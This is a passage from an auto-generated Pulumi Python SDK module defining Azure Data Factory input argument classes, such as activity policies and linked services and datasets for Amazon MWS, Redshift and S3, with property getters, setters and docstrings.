'IntegrationRuntimeSsisPropertiesArgs',
'IntegrationRuntimeVNetPropertiesArgs',
'JiraLinkedServiceArgs',
'JiraObjectDatasetArgs',
'JsonFormatArgs',
'LinkedIntegrationRuntimeKeyArgs',
'LinkedIntegrationRuntimeRbacArgs',
'LinkedServiceReferenceArgs',
'MagentoLinkedServiceArgs',
'MagentoObjectDatasetArgs',
'ManagedIntegrationRuntimeArgs',
'MariaDBLinkedServiceArgs',
'MariaDBTableDatasetArgs',
'MarketoLinkedServiceArgs',
'MarketoObjectDatasetArgs',
'MongoDbCollectionDatasetArgs',
'MongoDbLinkedServiceArgs',
'MultiplePipelineTriggerArgs',
'MySqlLinkedServiceArgs',
'NetezzaLinkedServiceArgs',
'NetezzaTableDatasetArgs',
'ODataLinkedServiceArgs',
'ODataResourceDatasetArgs',
'OdbcLinkedServiceArgs',
'OracleLinkedServiceArgs',
'OracleTableDatasetArgs',
'OrcFormatArgs',
'ParameterSpecificationArgs',
'ParquetFormatArgs',
'PaypalLinkedServiceArgs',
'PaypalObjectDatasetArgs',
'PhoenixLinkedServiceArgs',
'PhoenixObjectDatasetArgs',
'PipelineReferenceArgs',
'PostgreSqlLinkedServiceArgs',
'PrestoLinkedServiceArgs',
'PrestoObjectDatasetArgs',
'QuickBooksLinkedServiceArgs',
'QuickBooksObjectDatasetArgs',
'RelationalTableDatasetArgs',
'ResponsysLinkedServiceArgs',
'ResponsysObjectDatasetArgs',
'RetryPolicyArgs',
'SalesforceLinkedServiceArgs',
'SalesforceMarketingCloudLinkedServiceArgs',
'SalesforceMarketingCloudObjectDatasetArgs',
'SalesforceObjectDatasetArgs',
'SapBWLinkedServiceArgs',
'SapCloudForCustomerLinkedServiceArgs',
'SapCloudForCustomerResourceDatasetArgs',
'SapEccLinkedServiceArgs',
'SapEccResourceDatasetArgs',
'SapHanaLinkedServiceArgs',
'SecureStringArgs',
'SelfHostedIntegrationRuntimeArgs',
'ServiceNowLinkedServiceArgs',
'ServiceNowObjectDatasetArgs',
'SftpServerLinkedServiceArgs',
'ShopifyLinkedServiceArgs',
'ShopifyObjectDatasetArgs',
'SparkLinkedServiceArgs',
'SparkObjectDatasetArgs',
'SqlServerLinkedServiceArgs',
'SqlServerTableDatasetArgs',
'SquareLinkedServiceArgs',
'SquareObjectDatasetArgs',
'SybaseLinkedServiceArgs',
'TeradataLinkedServiceArgs',
'TextFormatArgs',
'TriggerPipelineReferenceArgs',
'TumblingWindowTriggerArgs',
'VerticaLinkedServiceArgs',
'VerticaTableDatasetArgs',
'WebAnonymousAuthenticationArgs',
'WebBasicAuthenticationArgs',
'WebClientCertificateAuthenticationArgs',
'WebLinkedServiceArgs',
'WebTableDatasetArgs',
'XeroLinkedServiceArgs',
'XeroObjectDatasetArgs',
'ZohoLinkedServiceArgs',
'ZohoObjectDatasetArgs',
]
@pulumi.input_type
class ActivityDependencyArgs:
def __init__(__self__, *,
activity: pulumi.Input[str],
dependency_conditions: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
Activity dependency information.
:param pulumi.Input[str] activity: Activity name.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dependency_conditions: Match-Condition for the dependency.
"""
pulumi.set(__self__, "activity", activity)
pulumi.set(__self__, "dependency_conditions", dependency_conditions)
@property
@pulumi.getter
def activity(self) -> pulumi.Input[str]:
"""
Activity name.
"""
return pulumi.get(self, "activity")
@activity.setter
def activity(self, value: pulumi.Input[str]):
pulumi.set(self, "activity", value)
@property
@pulumi.getter(name="dependencyConditions")
def dependency_conditions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Match-Condition for the dependency.
"""
return pulumi.get(self, "dependency_conditions")
@dependency_conditions.setter
def dependency_conditions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "dependency_conditions", value)
@pulumi.input_type
class ActivityPolicyArgs:
def __init__(__self__, *,
retry: Optional[Any] = None,
retry_interval_in_seconds: Optional[pulumi.Input[int]] = None,
secure_output: Optional[pulumi.Input[bool]] = None,
timeout: Optional[Any] = None):
"""
Execution policy for an activity.
:param Any retry: Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[int] retry_interval_in_seconds: Interval between each retry attempt (in seconds). The default is 30 sec.
:param pulumi.Input[bool] secure_output: When set to true, Output from activity is considered as secure and will not be logged to monitoring.
:param Any timeout: Specifies the timeout for the activity to run. The default timeout is 7 days. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
if retry is not None:
pulumi.set(__self__, "retry", retry)
if retry_interval_in_seconds is not None:
pulumi.set(__self__, "retry_interval_in_seconds", retry_interval_in_seconds)
if secure_output is not None:
pulumi.set(__self__, "secure_output", secure_output)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
@property
@pulumi.getter
def retry(self) -> Optional[Any]:
"""
Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[Any]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="retryIntervalInSeconds")
def retry_interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Interval between each retry attempt (in seconds). The default is 30 sec.
"""
return pulumi.get(self, "retry_interval_in_seconds")
@retry_interval_in_seconds.setter
def retry_interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_interval_in_seconds", value)
@property
@pulumi.getter(name="secureOutput")
def secure_output(self) -> Optional[pulumi.Input[bool]]:
"""
When set to true, Output from activity is considered as secure and will not be logged to monitoring.
"""
return pulumi.get(self, "secure_output")
@secure_output.setter
def secure_output(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "secure_output", value)
@property
@pulumi.getter
def timeout(self) -> Optional[Any]:
"""
Specifies the timeout for the activity to run. The default timeout is 7 days. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[Any]):
pulumi.set(self, "timeout", value)
@pulumi.input_type
class AmazonMWSLinkedServiceArgs:
def __init__(__self__, *,
access_key_id: Any,
endpoint: Any,
marketplace_id: Any,
seller_id: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
mws_auth_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
secret_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Amazon Marketplace Web Service linked service.
:param Any access_key_id: The access key id used to access data.
:param Any endpoint: The endpoint of the Amazon MWS server, (i.e. mws.amazonservices.com)
:param Any marketplace_id: The Amazon Marketplace ID you want to retrieve data from. To retrieve data from multiple Marketplace IDs, separate them with a comma (,). (i.e. A2EUQ1WTGCTBG2)
:param Any seller_id: The Amazon seller ID.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] mws_auth_token: The Amazon MWS authentication token.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] secret_key: The secret key used to access data.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "access_key_id", access_key_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "marketplace_id", marketplace_id)
pulumi.set(__self__, "seller_id", seller_id)
pulumi.set(__self__, "type", 'AmazonMWS')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if mws_auth_token is not None:
pulumi.set(__self__, "mws_auth_token", mws_auth_token)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if secret_key is not None:
pulumi.set(__self__, "secret_key", secret_key)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="accessKeyId")
def access_key_id(self) -> Any:
"""
The access key id used to access data.
"""
return pulumi.get(self, "access_key_id")
@access_key_id.setter
def access_key_id(self, value: Any):
pulumi.set(self, "access_key_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Amazon MWS server, (i.e. mws.amazonservices.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="marketplaceID")
def marketplace_id(self) -> Any:
"""
The Amazon Marketplace ID you want to retrieve data from. To retrieve data from multiple Marketplace IDs, separate them with a comma (,). (i.e. A2EUQ1WTGCTBG2)
"""
return pulumi.get(self, "marketplace_id")
@marketplace_id.setter
def marketplace_id(self, value: Any):
pulumi.set(self, "marketplace_id", value)
@property
@pulumi.getter(name="sellerID")
def seller_id(self) -> Any:
"""
The Amazon seller ID.
"""
return pulumi.get(self, "seller_id")
@seller_id.setter
def seller_id(self, value: Any):
pulumi.set(self, "seller_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="mwsAuthToken")
def mws_auth_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Amazon MWS authentication token.
"""
return pulumi.get(self, "mws_auth_token")
@mws_auth_token.setter
def mws_auth_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "mws_auth_token", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The secret key used to access data.
"""
return pulumi.get(self, "secret_key")
@secret_key.setter
def secret_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "secret_key", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class AmazonMWSObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Amazon Marketplace Web Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AmazonMWSObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AmazonRedshiftLinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Amazon Redshift.
:param Any database: The database name of the Amazon Redshift source. Type: string (or Expression with resultType string).
:param Any server: The name of the Amazon Redshift server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password of the Amazon Redshift source.
:param Any port: The TCP port number that the Amazon Redshift server uses to listen for client connections. The default value is 5439. Type: integer (or Expression with resultType integer).
:param Any username: The username of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'AmazonRedshift')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
The database name of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
The name of the Amazon Redshift server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password of the Amazon Redshift source.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the Amazon Redshift server uses to listen for client connections. The default value is 5439. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username of the Amazon Redshift source. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class AmazonS3DatasetArgs:
def __init__(__self__, *,
bucket_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
key: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
prefix: Optional[Any] = None,
structure: Optional[Any] = None,
version: Optional[Any] = None):
"""
A single Amazon Simple Storage Service (S3) object or a set of S3 objects.
:param Any bucket_name: The name of the Amazon S3 bucket. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the Amazon S3 object.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of files.
:param Any key: The key of the Amazon S3 object. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any prefix: The prefix filter for the S3 object name. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any version: The version for the S3 object. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "bucket_name", bucket_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AmazonS3Object')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if key is not None:
pulumi.set(__self__, "key", key)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> Any:
"""
The name of the Amazon S3 bucket. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: Any):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the Amazon S3 object.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def key(self) -> Optional[Any]:
"""
The key of the Amazon S3 object. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[Any]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def prefix(self) -> Optional[Any]:
"""
The prefix filter for the S3 object name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[Any]):
pulumi.set(self, "prefix", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter
def version(self) -> Optional[Any]:
"""
The version for the S3 object. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[Any]):
pulumi.set(self, "version", value)
@pulumi.input_type
class AmazonS3LinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
access_key_id: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
secret_access_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None):
"""
Linked service for Amazon S3.
:param pulumi.Input[str] type: Type of linked service.
:param Any access_key_id: The access key identifier of the Amazon S3 Identity and Access Management (IAM) user. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] secret_access_key: The secret access key of the Amazon S3 Identity and Access Management (IAM) user.
"""
pulumi.set(__self__, "type", 'AmazonS3')
if access_key_id is not None:
